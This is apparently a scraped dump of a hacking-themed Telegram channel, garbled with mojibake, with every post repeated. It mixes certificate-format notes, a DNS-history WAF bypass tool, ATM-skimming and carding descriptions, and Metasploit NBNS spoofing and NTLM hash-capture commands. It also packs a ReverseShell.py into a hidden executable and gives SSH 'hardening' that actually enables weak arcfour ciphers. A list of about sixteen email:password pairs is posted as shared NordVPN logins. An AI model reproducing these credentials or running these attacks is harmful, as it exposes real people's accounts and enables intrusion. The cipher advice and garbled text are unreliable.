β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Key and Certificate Formats
1οΈβ£Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
2οΈβ£Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
3οΈβ£ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require the server certificate to be one in one file, and all intermediate certificates in another.
4οΈβ£Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
5οΈβ£ASCII (PEM) key
Contains a DER64 key in base64 encoding , sometimes with additional metadata (for example, the algorithm used for password protection).
6οΈβ£PKCS # 7 Certificate
A complex format for transporting signed or encrypted data defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
7οΈβ£PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect a server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Key and Certificate Formats
1οΈβ£Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
2οΈβ£Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
3οΈβ£ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require the server certificate to be one in one file, and all intermediate certificates in another.
4οΈβ£Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
5οΈβ£ASCII (PEM) key
Contains a DER64 key in base64 encoding , sometimes with additional metadata (for example, the algorithm used for password protection).
6οΈβ£PKCS # 7 Certificate
A complex format for transporting signed or encrypted data defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
7οΈβ£PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect a server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications : Possible ?
Web application firewalls (Web Application Firewall - WAF) are web server add-ons (modules) (such as mod_security for Apache), or services (such as Cloudflare, Incapsula, SUCURI) that before transmitting a web request from a user -server, analyze it and, if it can be dangerous, block it or modify it.
Application firewalls can additionally perform intrusion detection and prevention functions.
If WAF is a web server module, then this software runs on the same server (computer). If WAF is a separate service, then the scheme of work is as follows:
1) The website to be protected runs on the same server without protection.
2) In the DNS record A, the IP addresses of the web application firewall, that is, Cloudflare, Incapsula, SUCURI or some other, are indicated as the IP of this site
3). After that, when accessing the protected website, all requests are already sent to the Cloudflare, Incapsula, SUCURI or equivalent service
4) This service receives a request, processes it and makes a request to the source server (which, I recall, is not even protected), receives from it the desired page / data and redirects to the requesting user.
π¦For a normal visitor connecting to a website, there is no difference; everything happens unnoticed. But for website audit purposes, file firewalls can become problems. WAF blocks malicious requests and protects against (D) DoS attacks. At the same time, no requests from scripts (bots) can be accepted at all - they are filtered out at the initial stage, or at the stage of passing captcha, which makes it impossible to use tools such as WPScan , sqlmap and other programs to search for vulnerabilities and assess the security of the website. If in the case of WAFs built into the server (for example, mod_security), only one bypass option is possible - the design of such requests that deceive the rules based on patterns (patterns), then for WAF services there are two possible options:
1) The same as for regular WAFs - that is, an attempt to outsmart the rules;
2) Sending requests directly to the server, bypassing WAF.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Installing Bypass firewalls by abusing DNS history in Kali Linux:
1οΈβ£sudo apt install jq<font></font>
2οΈβ£git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history<font></font>
3οΈβ£cd bypass-firewalls-by-DNS-history/<font></font>
4οΈβ£bash bypass-firewalls-by-DNS-history.sh --help
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications : Possible ?
Web application firewalls (Web Application Firewall - WAF) are web server add-ons (modules) (such as mod_security for Apache), or services (such as Cloudflare, Incapsula, SUCURI) that before transmitting a web request from a user -server, analyze it and, if it can be dangerous, block it or modify it.
Application firewalls can additionally perform intrusion detection and prevention functions.
If WAF is a web server module, then this software runs on the same server (computer). If WAF is a separate service, then the scheme of work is as follows:
1) The website to be protected runs on the same server without protection.
2) In the DNS record A, the IP addresses of the web application firewall, that is, Cloudflare, Incapsula, SUCURI or some other, are indicated as the IP of this site
3). After that, when accessing the protected website, all requests are already sent to the Cloudflare, Incapsula, SUCURI or equivalent service
4) This service receives a request, processes it and makes a request to the source server (which, I recall, is not even protected), receives from it the desired page / data and redirects to the requesting user.
π¦For a normal visitor connecting to a website, there is no difference; everything happens unnoticed. But for website audit purposes, file firewalls can become problems. WAF blocks malicious requests and protects against (D) DoS attacks. At the same time, no requests from scripts (bots) can be accepted at all - they are filtered out at the initial stage, or at the stage of passing captcha, which makes it impossible to use tools such as WPScan , sqlmap and other programs to search for vulnerabilities and assess the security of the website. If in the case of WAFs built into the server (for example, mod_security), only one bypass option is possible - the design of such requests that deceive the rules based on patterns (patterns), then for WAF services there are two possible options:
1) The same as for regular WAFs - that is, an attempt to outsmart the rules;
2) Sending requests directly to the server, bypassing WAF.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Installing Bypass firewalls by abusing DNS history in Kali Linux:
1οΈβ£sudo apt install jq<font></font>
2οΈβ£git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history<font></font>
3οΈβ£cd bypass-firewalls-by-DNS-history/<font></font>
4οΈβ£bash bypass-firewalls-by-DNS-history.sh --help
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - vincentcox/bypass-firewalls-by-DNS-history: Firewall bypass script based on DNS history records. This script will searchβ¦
Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters. - vincentcox/byp...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random linux tips :
> for Configure two tomcat project deployments on a virtual machine
> Turn off the firewall and selinux
1οΈβ£[root@keiv~]# systemctl stop firewalld
2οΈβ£[root@keiv ~]# systemctl disable firewalld
3οΈβ£Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.
4οΈβ£Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
5οΈβ£[root@keiv ~]# setenforce 0
6οΈβ£[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config
π¦Install jdk environment
1οΈβ£[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel
2οΈβ£[root@keiv ~]# java -version
openjdk version "1.8.0_181"
> OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
π¦tomcat deployment
Download tomcat
[root@keiv ~]# cd /usr/src/
[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random linux tips :
> for Configure two tomcat project deployments on a virtual machine
> Turn off the firewall and selinux
1οΈβ£[root@keiv~]# systemctl stop firewalld
2οΈβ£[root@keiv ~]# systemctl disable firewalld
3οΈβ£Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.
4οΈβ£Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
5οΈβ£[root@keiv ~]# setenforce 0
6οΈβ£[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config
π¦Install jdk environment
1οΈβ£[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel
2οΈβ£[root@keiv ~]# java -version
openjdk version "1.8.0_181"
> OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
π¦tomcat deployment
Download tomcat
[root@keiv ~]# cd /usr/src/
[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦top ways hack atm #secure against them
the "electronic Sherlock Holmes" share 9 main types of cybercrime.
1. Operations with fake cards.
2. Operations with stolen / lost cards.
3. Multiple payment for services and goods.
4. Fraud with mail / telephone orders.
5. Repeated withdrawal from the account.
6. Fraud using fake slip.
7. Fraudulent use of ATMs in cash withdrawals.
8. Connecting an electronic recording device to a POS terminal / ATM (Skimming).
9. Other types of fraud.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦top ways hack atm #secure against them
the "electronic Sherlock Holmes" share 9 main types of cybercrime.
1. Operations with fake cards.
2. Operations with stolen / lost cards.
3. Multiple payment for services and goods.
4. Fraud with mail / telephone orders.
5. Repeated withdrawal from the account.
6. Fraud using fake slip.
7. Fraudulent use of ATMs in cash withdrawals.
8. Connecting an electronic recording device to a POS terminal / ATM (Skimming).
9. Other types of fraud.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME VERIFIED PUBLIC NORDVPN PRE :
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOP 7 WAYS- ILLEGAL HACKING $- BY BAD HACKERS :
First way
Often, scammers use devices that, when installed on an ATM, help them get information about the card. It can be special βnozzlesβ installed on the keyboard, which externally repeat the original buttons. In this case, the cardholder withdraws money from the account without any problems, but at the same time, the fake keyboard remembers all the keys pressed - of course, including the PIN code. Tip: carefully study the keyboard of an unfamiliar ATM before withdrawing money from your account.
Second way
Another device is what the English also call lebanese loops. These are plastic envelopes, the size of which is slightly larger than the size of the card - they are laid in the slot of the ATM. The owner of the credit card is trying to withdraw money, but the ATM cannot read the data from the magnetic strip. In addition, due to the design of the envelope, it is not possible to return the card. At this time, the attacker comes up and says that literally a day ago, the same thing happened to him. To return the card, you just need to enter the pin code and double-click Cancel. The cardholder tries, and, of course, nothing happens. He decides that the card has remained at the ATM, and leaves to contact the bank. The fraudster calmly takes out a credit card with an envelope using some simple means at hand. He already knows the pin code - the owner (now former) of "plastic" he himself introduced him in the presence of a swindler. The thief can only withdraw money from the account.
Third way
Itβs technically difficult, but you can intercept the data that the ATM sends to the bank in order to verify the availability of the requested amount of money in the account. To do this, fraudsters need to connect to the appropriate cable and read the necessary data. Considering that on the Internet the relevant instructions are easy to find in the public domain, and technological progress does not stand still, it can be argued: this option will be found more and more often.
The fourth way
In order to find out the pin code, some scammers leave a miniature video camera nearby. At the same time, they themselves are in the nearest car with a laptop, on the screen of which the numbers entered by the cardholder are visible. When entering a PIN code, cover your keyboard with your free hand.
Fifth way
Expensive, but one hundred percent faithful. There are times when fraudsters put their own βATMβ in a crowded place. True, for some reason it does not work and, naturally, does not give out any money. But it successfully reads all the necessary data from the card. And then it turns out that you already withdrew all the money from your account yesterday and for some reason do not want to remember this!
Sixth way
At one time, fraudsters from the UAE installed special devices in the holes for credit cards, which remembered all the data about the card inserted into the ATM. The cybercriminals could only peek at the pin code either in the first and fourth ways as described above, or simply peeping from behind. Well, the local native liked your ring, or your watch, or something else ...
Method Seven
> You canβt fight him. You can only put up. Nothing here depends on your attentiveness, caution or prudence. It happens that conspiracy with scammers are those people who get to your credit cards and so very simply: bank employees, for example. This happens very rarely, but no one is safe from such cases.
> But not only cardholders suffer. Large firms, shops, and banks also suffer. And here the losses are already calculated in the hundreds of thousands of dollars. And sometimes in millions.
>Specialists from law enforcement agencies in many countries of the world believe that crimes committed using plastic means of payment can be attributed to one of the most dangerous economic crimes. Moreover, they are committed not only in the computer banking system, but also through the Internet.
π¦TOP 7 WAYS- ILLEGAL HACKING $- BY BAD HACKERS :
First way
Often, scammers use devices that, when installed on an ATM, help them get information about the card. It can be special βnozzlesβ installed on the keyboard, which externally repeat the original buttons. In this case, the cardholder withdraws money from the account without any problems, but at the same time, the fake keyboard remembers all the keys pressed - of course, including the PIN code. Tip: carefully study the keyboard of an unfamiliar ATM before withdrawing money from your account.
Second way
Another device is what the English also call lebanese loops. These are plastic envelopes, the size of which is slightly larger than the size of the card - they are laid in the slot of the ATM. The owner of the credit card is trying to withdraw money, but the ATM cannot read the data from the magnetic strip. In addition, due to the design of the envelope, it is not possible to return the card. At this time, the attacker comes up and says that literally a day ago, the same thing happened to him. To return the card, you just need to enter the pin code and double-click Cancel. The cardholder tries, and, of course, nothing happens. He decides that the card has remained at the ATM, and leaves to contact the bank. The fraudster calmly takes out a credit card with an envelope using some simple means at hand. He already knows the pin code - the owner (now former) of "plastic" he himself introduced him in the presence of a swindler. The thief can only withdraw money from the account.
Third way
Itβs technically difficult, but you can intercept the data that the ATM sends to the bank in order to verify the availability of the requested amount of money in the account. To do this, fraudsters need to connect to the appropriate cable and read the necessary data. Considering that on the Internet the relevant instructions are easy to find in the public domain, and technological progress does not stand still, it can be argued: this option will be found more and more often.
The fourth way
In order to find out the pin code, some scammers leave a miniature video camera nearby. At the same time, they themselves are in the nearest car with a laptop, on the screen of which the numbers entered by the cardholder are visible. When entering a PIN code, cover your keyboard with your free hand.
Fifth way
Expensive, but one hundred percent faithful. There are times when fraudsters put their own βATMβ in a crowded place. True, for some reason it does not work and, naturally, does not give out any money. But it successfully reads all the necessary data from the card. And then it turns out that you already withdrew all the money from your account yesterday and for some reason do not want to remember this!
Sixth way
At one time, fraudsters from the UAE installed special devices in the holes for credit cards, which remembered all the data about the card inserted into the ATM. The cybercriminals could only peek at the pin code either in the first and fourth ways as described above, or simply peeping from behind. Well, the local native liked your ring, or your watch, or something else ...
Method Seven
> You canβt fight him. You can only put up. Nothing here depends on your attentiveness, caution or prudence. It happens that conspiracy with scammers are those people who get to your credit cards and so very simply: bank employees, for example. This happens very rarely, but no one is safe from such cases.
> But not only cardholders suffer. Large firms, shops, and banks also suffer. And here the losses are already calculated in the hundreds of thousands of dollars. And sometimes in millions.
>Specialists from law enforcement agencies in many countries of the world believe that crimes committed using plastic means of payment can be attributed to one of the most dangerous economic crimes. Moreover, they are committed not only in the computer banking system, but also through the Internet.
> According to some reports, today there are about 30 types of illegal card transactions through the World Wide Web. The most common of them - payment by non-existent cards, the creation of fake virtual stores, electronic theft, fake payment in gambling establishments.
> There was even a special term - carding. It is the illegal use of bank cards to purchase goods or services over the Internet. When doing carding, you can either get information about a real card, or generate all this data, but so that all systems will take a fake for a real one. Those interested can freely find links to sites that openly sell stolen credit cards. The standard price for a card is from 40 cents to 5 dollars. Most of the sellers are in the former USSR, buyers, on the contrary, are concentrated in the Far East, the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have already earned a reputation as the countries where the most skilled hackers live.
> Virtual bazaars are arranged almost like real exchanges, prices fluctuate depending on demand. They are located on hacked pages and therefore are short-lived - most of these pages live only a couple of days. Experts agree that the center of global carding is St. Petersburg, where credit cards leave the counter in batches of 500-5000 pieces at a price of $ 1 per piece.
> Credit cards are obtained by breaking into large financial firms. For example, in 2003, after refusing to pay hackers money for silence, the well-known financial firm CD Universe admitted to losing a database of 300,000 cards. England alone lost 411 million pounds on carding in 2003. In 2005, this figure rose to a billion. Therefore, 25 million pounds were allocated to combat cybercrime.
enjoyβ€οΈππ»
USE FOR LEARN !!!!!!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
> There was even a special term - carding. It is the illegal use of bank cards to purchase goods or services over the Internet. When doing carding, you can either get information about a real card, or generate all this data, but so that all systems will take a fake for a real one. Those interested can freely find links to sites that openly sell stolen credit cards. The standard price for a card is from 40 cents to 5 dollars. Most of the sellers are in the former USSR, buyers, on the contrary, are concentrated in the Far East, the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have already earned a reputation as the countries where the most skilled hackers live.
> Virtual bazaars are arranged almost like real exchanges, prices fluctuate depending on demand. They are located on hacked pages and therefore are short-lived - most of these pages live only a couple of days. Experts agree that the center of global carding is St. Petersburg, where credit cards leave the counter in batches of 500-5000 pieces at a price of $ 1 per piece.
> Credit cards are obtained by breaking into large financial firms. For example, in 2003, after refusing to pay hackers money for silence, the well-known financial firm CD Universe admitted to losing a database of 300,000 cards. England alone lost 411 million pounds on carding in 2003. In 2005, this figure rose to a billion. Therefore, 25 million pounds were allocated to combat cybercrime.
enjoyβ€οΈππ»
USE FOR LEARN !!!!!!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTML Capture
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
π¦Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.
netbios
> Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially βdeprecatedβ NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you wonβt be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:
π¦Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows 7--8-10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
enjoyβ€οΈππ»
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTML Capture
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
π¦Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.
netbios
> Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially βdeprecatedβ NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you wonβt be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:
π¦Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows 7--8-10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
enjoyβ€οΈππ»
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
> Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
> Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pyinstaller linux
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+Look for your .exe or your .app bundle in the dist directory.
#FastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pyinstaller linux
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+Look for your .exe or your .app bundle in the dist directory.
#FastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β